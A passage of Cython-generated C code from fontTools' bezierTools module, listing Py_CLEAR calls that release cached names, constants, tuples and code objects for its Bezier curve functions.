Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - 
Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_1_t); - Py_CLEAR(clear_module_state->__pyx_n_s_1_t_2); - Py_CLEAR(clear_module_state->__pyx_n_s_2_t_1_t); - Py_CLEAR(clear_module_state->__pyx_kp_u_Approximates_the_arc_length_for); - Py_CLEAR(clear_module_state->__pyx_n_s_AttributeError); - Py_CLEAR(clear_module_state->__pyx_n_s_COMPILED); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_arc_length_for_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_Couldn_t_work_out_which_intersec); - Py_CLEAR(clear_module_state->__pyx_n_s_DD); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_a_cu); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_a_cu_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_two); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_two_2); - Py_CLEAR(clear_module_state->__pyx_n_s_Identity); - Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); - Py_CLEAR(clear_module_state->__pyx_n_s_Intersection); - Py_CLEAR(clear_module_state->__pyx_n_u_Intersection); - Py_CLEAR(clear_module_state->__pyx_n_s_Len); - Py_CLEAR(clear_module_state->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p); - Py_CLEAR(clear_module_state->__pyx_n_s_Q); - Py_CLEAR(clear_module_state->__pyx_n_s_Q3); - Py_CLEAR(clear_module_state->__pyx_n_s_R); - Py_CLEAR(clear_module_state->__pyx_n_s_R2); - Py_CLEAR(clear_module_state->__pyx_n_s_R2_Q3); - Py_CLEAR(clear_module_state->__pyx_kp_u_Solve_a_cubic_equation_Solves_a); - 
Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_line_at_a_given_coordina); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2); - Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); - Py_CLEAR(clear_module_state->__pyx_kp_u_Unknown_curve_degree); - Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); - Py_CLEAR(clear_module_state->__pyx_kp_u__10); - Py_CLEAR(clear_module_state->__pyx_n_s__103); - Py_CLEAR(clear_module_state->__pyx_n_s__11); - Py_CLEAR(clear_module_state->__pyx_kp_u__9); - Py_CLEAR(clear_module_state->__pyx_n_s__91); - Py_CLEAR(clear_module_state->__pyx_n_s_a); - Py_CLEAR(clear_module_state->__pyx_n_s_a1); - Py_CLEAR(clear_module_state->__pyx_n_s_a1_3); - Py_CLEAR(clear_module_state->__pyx_n_s_a1x); - Py_CLEAR(clear_module_state->__pyx_n_s_a1y); - Py_CLEAR(clear_module_state->__pyx_n_s_a2); - Py_CLEAR(clear_module_state->__pyx_n_s_a3); - Py_CLEAR(clear_module_state->__pyx_n_s_acos); - Py_CLEAR(clear_module_state->__pyx_n_s_aligned_curve); - Py_CLEAR(clear_module_state->__pyx_n_s_alignment_transformation); - Py_CLEAR(clear_module_state->__pyx_n_s_all); - Py_CLEAR(clear_module_state->__pyx_n_s_angle); - Py_CLEAR(clear_module_state->__pyx_n_s_append); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_kp_u_approximateCubicArcLength_line_3); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateQuadraticArcLength); - 
Py_CLEAR(clear_module_state->__pyx_n_s_approximateQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_s_arch); - Py_CLEAR(clear_module_state->__pyx_n_s_args); - Py_CLEAR(clear_module_state->__pyx_n_s_asinh); - Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); - Py_CLEAR(clear_module_state->__pyx_n_s_atan2); - Py_CLEAR(clear_module_state->__pyx_n_s_ax); - Py_CLEAR(clear_module_state->__pyx_n_s_ax2); - Py_CLEAR(clear_module_state->__pyx_n_s_ax3); - Py_CLEAR(clear_module_state->__pyx_n_s_ay); - Py_CLEAR(clear_module_state->__pyx_n_s_ay2); - Py_CLEAR(clear_module_state->__pyx_n_s_ay3); - Py_CLEAR(clear_module_state->__pyx_n_s_b); - Py_CLEAR(clear_module_state->__pyx_n_s_b1); - Py_CLEAR(clear_module_state->__pyx_n_s_b1x); - Py_CLEAR(clear_module_state->__pyx_n_s_b1y); - Py_CLEAR(clear_module_state->__pyx_n_s_both_points_are_on_same_side_of); - Py_CLEAR(clear_module_state->__pyx_n_s_bounds1); - Py_CLEAR(clear_module_state->__pyx_n_s_bounds2); - Py_CLEAR(clear_module_state->__pyx_n_s_box); - Py_CLEAR(clear_module_state->__pyx_n_s_bx); - Py_CLEAR(clear_module_state->__pyx_n_s_bx2); - Py_CLEAR(clear_module_state->__pyx_n_s_by); - Py_CLEAR(clear_module_state->__pyx_n_s_by2); - Py_CLEAR(clear_module_state->__pyx_n_s_c); - Py_CLEAR(clear_module_state->__pyx_n_s_c1); - Py_CLEAR(clear_module_state->__pyx_n_s_c11); - Py_CLEAR(clear_module_state->__pyx_n_s_c11_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c12); - Py_CLEAR(clear_module_state->__pyx_n_s_c12_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c1x); - Py_CLEAR(clear_module_state->__pyx_n_s_c1y); - Py_CLEAR(clear_module_state->__pyx_n_s_c21); - Py_CLEAR(clear_module_state->__pyx_n_s_c21_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c22); - Py_CLEAR(clear_module_state->__pyx_n_s_c22_range); - Py_CLEAR(clear_module_state->__pyx_n_s_calcBounds); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLength); - 
Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLengthCRecurse); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicBounds); - Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicBounds); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcCubicBounds_line_412); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicParameters); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcQuadraticArcLength_line_151); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticBounds); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticBounds); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcQuadraticBounds_line_298); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticParameters); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); - Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); - Py_CLEAR(clear_module_state->__pyx_n_s_close); - Py_CLEAR(clear_module_state->__pyx_n_s_collections); - Py_CLEAR(clear_module_state->__pyx_n_s_cos); - Py_CLEAR(clear_module_state->__pyx_n_s_cubicPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_cubicPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_cubicPointAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_cubicPointAtTC); - Py_CLEAR(clear_module_state->__pyx_n_s_curve); - Py_CLEAR(clear_module_state->__pyx_n_s_curve1); - Py_CLEAR(clear_module_state->__pyx_n_s_curve2); - Py_CLEAR(clear_module_state->__pyx_n_s_curveCurveIntersections); - 
Py_CLEAR(clear_module_state->__pyx_n_u_curveCurveIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_curveCurveIntersections_line_137); - Py_CLEAR(clear_module_state->__pyx_n_s_curveLineIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_curveLineIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_curveLineIntersections_line_1248); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_bounds); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t_loc); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t_loc_2); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_line_intersections_t); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_line_intersections_t_loca); - Py_CLEAR(clear_module_state->__pyx_n_s_cx); - Py_CLEAR(clear_module_state->__pyx_n_s_cy); - Py_CLEAR(clear_module_state->__pyx_n_s_cython); - Py_CLEAR(clear_module_state->__pyx_n_s_d); - Py_CLEAR(clear_module_state->__pyx_n_s_d0); - Py_CLEAR(clear_module_state->__pyx_n_s_d1); - Py_CLEAR(clear_module_state->__pyx_n_s_d1x); - Py_CLEAR(clear_module_state->__pyx_n_s_d1y); - Py_CLEAR(clear_module_state->__pyx_n_s_delta); - Py_CLEAR(clear_module_state->__pyx_n_s_delta_2); - Py_CLEAR(clear_module_state->__pyx_n_s_delta_3); - Py_CLEAR(clear_module_state->__pyx_n_s_deriv3); - Py_CLEAR(clear_module_state->__pyx_kp_u_disable); - Py_CLEAR(clear_module_state->__pyx_n_s_doctest); - Py_CLEAR(clear_module_state->__pyx_n_s_dx); - Py_CLEAR(clear_module_state->__pyx_n_s_dy); - Py_CLEAR(clear_module_state->__pyx_n_s_e); - Py_CLEAR(clear_module_state->__pyx_n_s_e1); - Py_CLEAR(clear_module_state->__pyx_n_s_e1x); - Py_CLEAR(clear_module_state->__pyx_n_s_e1y); - Py_CLEAR(clear_module_state->__pyx_n_s_e2); - Py_CLEAR(clear_module_state->__pyx_n_s_e2x); - Py_CLEAR(clear_module_state->__pyx_n_s_e2y); - Py_CLEAR(clear_module_state->__pyx_kp_u_enable); - Py_CLEAR(clear_module_state->__pyx_n_s_end); - 
Py_CLEAR(clear_module_state->__pyx_n_s_epsilon); - Py_CLEAR(clear_module_state->__pyx_n_s_epsilonDigits); - Py_CLEAR(clear_module_state->__pyx_n_s_ex); - Py_CLEAR(clear_module_state->__pyx_n_s_exit); - Py_CLEAR(clear_module_state->__pyx_n_s_ey); - Py_CLEAR(clear_module_state->__pyx_n_s_failed); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_arrayTools); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_bezierTools); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_transform); - Py_CLEAR(clear_module_state->__pyx_n_s_found); - Py_CLEAR(clear_module_state->__pyx_kp_u_g); - Py_CLEAR(clear_module_state->__pyx_kp_u_gc); - Py_CLEAR(clear_module_state->__pyx_n_s_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_i); - Py_CLEAR(clear_module_state->__pyx_n_s_import); - Py_CLEAR(clear_module_state->__pyx_n_s_initializing); - Py_CLEAR(clear_module_state->__pyx_n_s_insert); - Py_CLEAR(clear_module_state->__pyx_n_s_intersection_ts); - Py_CLEAR(clear_module_state->__pyx_n_s_intersections); - Py_CLEAR(clear_module_state->__pyx_n_s_intersects); - Py_CLEAR(clear_module_state->__pyx_n_s_isHorizontal); - Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); - Py_CLEAR(clear_module_state->__pyx_n_s_isclose); - Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); - Py_CLEAR(clear_module_state->__pyx_n_s_it); - Py_CLEAR(clear_module_state->__pyx_n_s_key); - Py_CLEAR(clear_module_state->__pyx_n_s_line); - Py_CLEAR(clear_module_state->__pyx_n_s_lineLineIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_lineLineIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_lineLineIntersections_line_1147); - Py_CLEAR(clear_module_state->__pyx_n_s_linePointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_linePointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_line_t); - Py_CLEAR(clear_module_state->__pyx_n_s_line_t_of_pt); - Py_CLEAR(clear_module_state->__pyx_n_s_main); - 
Py_CLEAR(clear_module_state->__pyx_n_u_main); - Py_CLEAR(clear_module_state->__pyx_n_s_math); - Py_CLEAR(clear_module_state->__pyx_n_s_mid); - Py_CLEAR(clear_module_state->__pyx_n_s_midPt); - Py_CLEAR(clear_module_state->__pyx_n_s_midpoint); - Py_CLEAR(clear_module_state->__pyx_n_s_mult); - Py_CLEAR(clear_module_state->__pyx_n_s_n); - Py_CLEAR(clear_module_state->__pyx_n_s_name); - Py_CLEAR(clear_module_state->__pyx_n_s_namedtuple); - Py_CLEAR(clear_module_state->__pyx_n_s_obj); - Py_CLEAR(clear_module_state->__pyx_n_s_off1); - Py_CLEAR(clear_module_state->__pyx_n_s_off2); - Py_CLEAR(clear_module_state->__pyx_n_s_one); - Py_CLEAR(clear_module_state->__pyx_n_s_origDist); - Py_CLEAR(clear_module_state->__pyx_n_s_origin); - Py_CLEAR(clear_module_state->__pyx_n_s_p0); - Py_CLEAR(clear_module_state->__pyx_n_s_p1); - Py_CLEAR(clear_module_state->__pyx_n_s_p2); - Py_CLEAR(clear_module_state->__pyx_n_s_p3); - Py_CLEAR(clear_module_state->__pyx_n_s_pi); - Py_CLEAR(clear_module_state->__pyx_n_s_pointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_pointFinder); - Py_CLEAR(clear_module_state->__pyx_n_s_points); - Py_CLEAR(clear_module_state->__pyx_n_s_precision); - Py_CLEAR(clear_module_state->__pyx_n_s_print); - Py_CLEAR(clear_module_state->__pyx_n_s_printSegments); - Py_CLEAR(clear_module_state->__pyx_n_s_pt); - Py_CLEAR(clear_module_state->__pyx_n_u_pt); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1x); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1y); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2x); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2y); - Py_CLEAR(clear_module_state->__pyx_n_s_pt3); - Py_CLEAR(clear_module_state->__pyx_n_s_pt4); - Py_CLEAR(clear_module_state->__pyx_n_s_px); - Py_CLEAR(clear_module_state->__pyx_n_s_py); - Py_CLEAR(clear_module_state->__pyx_n_s_quadraticPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_quadraticPointAtT); - 
Py_CLEAR(clear_module_state->__pyx_n_s_r); - Py_CLEAR(clear_module_state->__pyx_n_s_rDD); - Py_CLEAR(clear_module_state->__pyx_n_s_rQ2); - Py_CLEAR(clear_module_state->__pyx_n_s_range); - Py_CLEAR(clear_module_state->__pyx_n_s_range1); - Py_CLEAR(clear_module_state->__pyx_n_s_range2); - Py_CLEAR(clear_module_state->__pyx_n_s_rectArea); - Py_CLEAR(clear_module_state->__pyx_n_s_roots); - Py_CLEAR(clear_module_state->__pyx_n_s_rotate); - Py_CLEAR(clear_module_state->__pyx_n_s_round); - Py_CLEAR(clear_module_state->__pyx_n_s_s); - Py_CLEAR(clear_module_state->__pyx_n_s_s1); - Py_CLEAR(clear_module_state->__pyx_n_s_s1x); - Py_CLEAR(clear_module_state->__pyx_n_s_s1y); - Py_CLEAR(clear_module_state->__pyx_n_s_s2); - Py_CLEAR(clear_module_state->__pyx_n_s_s2x); - Py_CLEAR(clear_module_state->__pyx_n_s_s2y); - Py_CLEAR(clear_module_state->__pyx_kp_u_s_2); - Py_CLEAR(clear_module_state->__pyx_n_s_scale); - Py_CLEAR(clear_module_state->__pyx_n_s_sectRect); - Py_CLEAR(clear_module_state->__pyx_n_s_seen); - Py_CLEAR(clear_module_state->__pyx_n_s_seg); - Py_CLEAR(clear_module_state->__pyx_n_s_seg1); - Py_CLEAR(clear_module_state->__pyx_n_s_seg2); - Py_CLEAR(clear_module_state->__pyx_n_s_segment); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_segmentPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentSegmentIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_segmentSegmentIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentSegmentIntersections_line); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentrepr); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentrepr_line_1449); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentrepr_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_segments); - Py_CLEAR(clear_module_state->__pyx_n_s_send); - Py_CLEAR(clear_module_state->__pyx_n_s_slope12); - 
Py_CLEAR(clear_module_state->__pyx_n_s_slope34); - Py_CLEAR(clear_module_state->__pyx_n_s_solutions); - Py_CLEAR(clear_module_state->__pyx_n_s_solveCubic); - Py_CLEAR(clear_module_state->__pyx_n_u_solveCubic); - Py_CLEAR(clear_module_state->__pyx_kp_u_solveCubic_line_841); - Py_CLEAR(clear_module_state->__pyx_n_s_solveQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_u_solveQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_s_spec); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubic); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubic); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtTC_2); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtT_2); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicAtT_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitCubicAtT_line_613); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicIntoTwoAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicIntoTwoAtTC); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitCubic_line_552); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubic_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_splitLine); - Py_CLEAR(clear_module_state->__pyx_n_u_splitLine); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitLine_line_450); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_u_splitQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadraticAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadraticAtT_2); - Py_CLEAR(clear_module_state->__pyx_n_u_splitQuadraticAtT_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitQuadraticAtT_line_589); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitQuadratic_line_507); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadratic_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_split_cubic_into_two); - 
Py_CLEAR(clear_module_state->__pyx_n_s_split_segment_at_t); - Py_CLEAR(clear_module_state->__pyx_n_s_sqrt); - Py_CLEAR(clear_module_state->__pyx_n_s_start); - Py_CLEAR(clear_module_state->__pyx_n_s_swapped); - Py_CLEAR(clear_module_state->__pyx_n_s_sx); - Py_CLEAR(clear_module_state->__pyx_n_s_sy); - Py_CLEAR(clear_module_state->__pyx_n_s_sys); - Py_CLEAR(clear_module_state->__pyx_n_s_t); - Py_CLEAR(clear_module_state->__pyx_n_s_t1); - Py_CLEAR(clear_module_state->__pyx_n_u_t1); - Py_CLEAR(clear_module_state->__pyx_n_s_t1_2); - Py_CLEAR(clear_module_state->__pyx_n_s_t1_3); - Py_CLEAR(clear_module_state->__pyx_n_s_t2); - Py_CLEAR(clear_module_state->__pyx_n_u_t2); - Py_CLEAR(clear_module_state->__pyx_n_s_test); - Py_CLEAR(clear_module_state->__pyx_n_s_testmod); - Py_CLEAR(clear_module_state->__pyx_n_s_theta); - Py_CLEAR(clear_module_state->__pyx_n_s_throw); - Py_CLEAR(clear_module_state->__pyx_n_s_tolerance); - Py_CLEAR(clear_module_state->__pyx_n_s_transformPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_translate); - Py_CLEAR(clear_module_state->__pyx_n_s_ts); - Py_CLEAR(clear_module_state->__pyx_n_s_two); - Py_CLEAR(clear_module_state->__pyx_n_s_unique_key); - Py_CLEAR(clear_module_state->__pyx_n_s_unique_values); - Py_CLEAR(clear_module_state->__pyx_n_s_v0); - Py_CLEAR(clear_module_state->__pyx_n_s_v1); - Py_CLEAR(clear_module_state->__pyx_n_s_v2); - Py_CLEAR(clear_module_state->__pyx_n_s_v3); - Py_CLEAR(clear_module_state->__pyx_n_s_v4); - Py_CLEAR(clear_module_state->__pyx_n_s_where); - Py_CLEAR(clear_module_state->__pyx_n_s_x); - Py_CLEAR(clear_module_state->__pyx_n_s_x0); - Py_CLEAR(clear_module_state->__pyx_n_s_x1); - Py_CLEAR(clear_module_state->__pyx_n_s_x2); - Py_CLEAR(clear_module_state->__pyx_n_s_x3); - Py_CLEAR(clear_module_state->__pyx_n_s_x4); - Py_CLEAR(clear_module_state->__pyx_n_s_xDiff); - Py_CLEAR(clear_module_state->__pyx_n_s_xRoots); - Py_CLEAR(clear_module_state->__pyx_n_s_y); - Py_CLEAR(clear_module_state->__pyx_n_s_y1); - 
Py_CLEAR(clear_module_state->__pyx_n_s_y2); - Py_CLEAR(clear_module_state->__pyx_n_s_y3); - Py_CLEAR(clear_module_state->__pyx_n_s_y4); - Py_CLEAR(clear_module_state->__pyx_n_s_yDiff); - Py_CLEAR(clear_module_state->__pyx_n_s_yRoots); - Py_CLEAR(clear_module_state->__pyx_float_0_0); - Py_CLEAR(clear_module_state->__pyx_float_0_5); - Py_CLEAR(clear_module_state->__pyx_float_1_0); - Py_CLEAR(clear_module_state->__pyx_float_2_0); - Py_CLEAR(clear_module_state->__pyx_float_3_0); - Py_CLEAR(clear_module_state->__pyx_float_4_0); - Py_CLEAR(clear_module_state->__pyx_float_9_0); - Py_CLEAR(clear_module_state->__pyx_float_1eneg_3); - Py_CLEAR(clear_module_state->__pyx_float_27_0); - Py_CLEAR(clear_module_state->__pyx_float_54_0); - Py_CLEAR(clear_module_state->__pyx_float_0_005); - Py_CLEAR(clear_module_state->__pyx_float_0_125); - Py_CLEAR(clear_module_state->__pyx_float_1eneg_10); - Py_CLEAR(clear_module_state->__pyx_float_neg_2_0); - Py_CLEAR(clear_module_state->__pyx_int_0); - Py_CLEAR(clear_module_state->__pyx_int_1); - Py_CLEAR(clear_module_state->__pyx_int_2); - Py_CLEAR(clear_module_state->__pyx_int_3); - Py_CLEAR(clear_module_state->__pyx_int_6); - Py_CLEAR(clear_module_state->__pyx_int_neg_1); - Py_CLEAR(clear_module_state->__pyx_codeobj_); - Py_CLEAR(clear_module_state->__pyx_tuple__2); - Py_CLEAR(clear_module_state->__pyx_tuple__4); - Py_CLEAR(clear_module_state->__pyx_tuple__5); - Py_CLEAR(clear_module_state->__pyx_tuple__6); - Py_CLEAR(clear_module_state->__pyx_tuple__8); - Py_CLEAR(clear_module_state->__pyx_tuple__12); - Py_CLEAR(clear_module_state->__pyx_tuple__14); - Py_CLEAR(clear_module_state->__pyx_tuple__15); - Py_CLEAR(clear_module_state->__pyx_tuple__17); - Py_CLEAR(clear_module_state->__pyx_tuple__19); - Py_CLEAR(clear_module_state->__pyx_tuple__21); - Py_CLEAR(clear_module_state->__pyx_tuple__23); - Py_CLEAR(clear_module_state->__pyx_tuple__26); - Py_CLEAR(clear_module_state->__pyx_tuple__28); - Py_CLEAR(clear_module_state->__pyx_tuple__30); - 
Py_CLEAR(clear_module_state->__pyx_tuple__32); - Py_CLEAR(clear_module_state->__pyx_tuple__34); - Py_CLEAR(clear_module_state->__pyx_tuple__36); - Py_CLEAR(clear_module_state->__pyx_tuple__38); - Py_CLEAR(clear_module_state->__pyx_tuple__40); - Py_CLEAR(clear_module_state->__pyx_tuple__42); - Py_CLEAR(clear_module_state->__pyx_tuple__44); - Py_CLEAR(clear_module_state->__pyx_tuple__46); - Py_CLEAR(clear_module_state->__pyx_tuple__48); - Py_CLEAR(clear_module_state->__pyx_tuple__50); - Py_CLEAR(clear_module_state->__pyx_tuple__52); - Py_CLEAR(clear_module_state->__pyx_tuple__53); - Py_CLEAR(clear_module_state->__pyx_tuple__55); - Py_CLEAR(clear_module_state->__pyx_tuple__57); - Py_CLEAR(clear_module_state->__pyx_tuple__59); - Py_CLEAR(clear_module_state->__pyx_tuple__61); - Py_CLEAR(clear_module_state->__pyx_tuple__63); - Py_CLEAR(clear_module_state->__pyx_tuple__65); - Py_CLEAR(clear_module_state->__pyx_tuple__67); - Py_CLEAR(clear_module_state->__pyx_tuple__69); - Py_CLEAR(clear_module_state->__pyx_tuple__71); - Py_CLEAR(clear_module_state->__pyx_tuple__73); - Py_CLEAR(clear_module_state->__pyx_tuple__75); - Py_CLEAR(clear_module_state->__pyx_tuple__77); - Py_CLEAR(clear_module_state->__pyx_tuple__79); - Py_CLEAR(clear_module_state->__pyx_tuple__81); - Py_CLEAR(clear_module_state->__pyx_tuple__83); - Py_CLEAR(clear_module_state->__pyx_tuple__85); - Py_CLEAR(clear_module_state->__pyx_tuple__87); - Py_CLEAR(clear_module_state->__pyx_tuple__89); - Py_CLEAR(clear_module_state->__pyx_tuple__92); - Py_CLEAR(clear_module_state->__pyx_tuple__94); - Py_CLEAR(clear_module_state->__pyx_tuple__95); - Py_CLEAR(clear_module_state->__pyx_tuple__97); - Py_CLEAR(clear_module_state->__pyx_tuple__99); - Py_CLEAR(clear_module_state->__pyx_codeobj__3); - Py_CLEAR(clear_module_state->__pyx_codeobj__7); - Py_CLEAR(clear_module_state->__pyx_tuple__101); - Py_CLEAR(clear_module_state->__pyx_codeobj__13); - Py_CLEAR(clear_module_state->__pyx_codeobj__16); - 
Py_CLEAR(clear_module_state->__pyx_codeobj__18); - Py_CLEAR(clear_module_state->__pyx_codeobj__20); - Py_CLEAR(clear_module_state->__pyx_codeobj__22); - Py_CLEAR(clear_module_state->__pyx_codeobj__24); - Py_CLEAR(clear_module_state->__pyx_codeobj__25); - Py_CLEAR(clear_module_state->__pyx_codeobj__27); - Py_CLEAR(clear_module_state->__pyx_codeobj__29); - Py_CLEAR(clear_module_state->__pyx_codeobj__31); - Py_CLEAR(clear_module_state->__pyx_codeobj__33); - Py_CLEAR(clear_module_state->__pyx_codeobj__35); - Py_CLEAR(clear_module_state->__pyx_codeobj__37); - Py_CLEAR(clear_module_state->__pyx_codeobj__39); - Py_CLEAR(clear_module_state->__pyx_codeobj__41); - Py_CLEAR(clear_module_state->__pyx_codeobj__43); - Py_CLEAR(clear_module_state->__pyx_codeobj__45); - Py_CLEAR(clear_module_state->__pyx_codeobj__47); - Py_CLEAR(clear_module_state->__pyx_codeobj__49); - Py_CLEAR(clear_module_state->__pyx_codeobj__51); - Py_CLEAR(clear_module_state->__pyx_codeobj__54); - Py_CLEAR(clear_module_state->__pyx_codeobj__56); - Py_CLEAR(clear_module_state->__pyx_codeobj__58); - 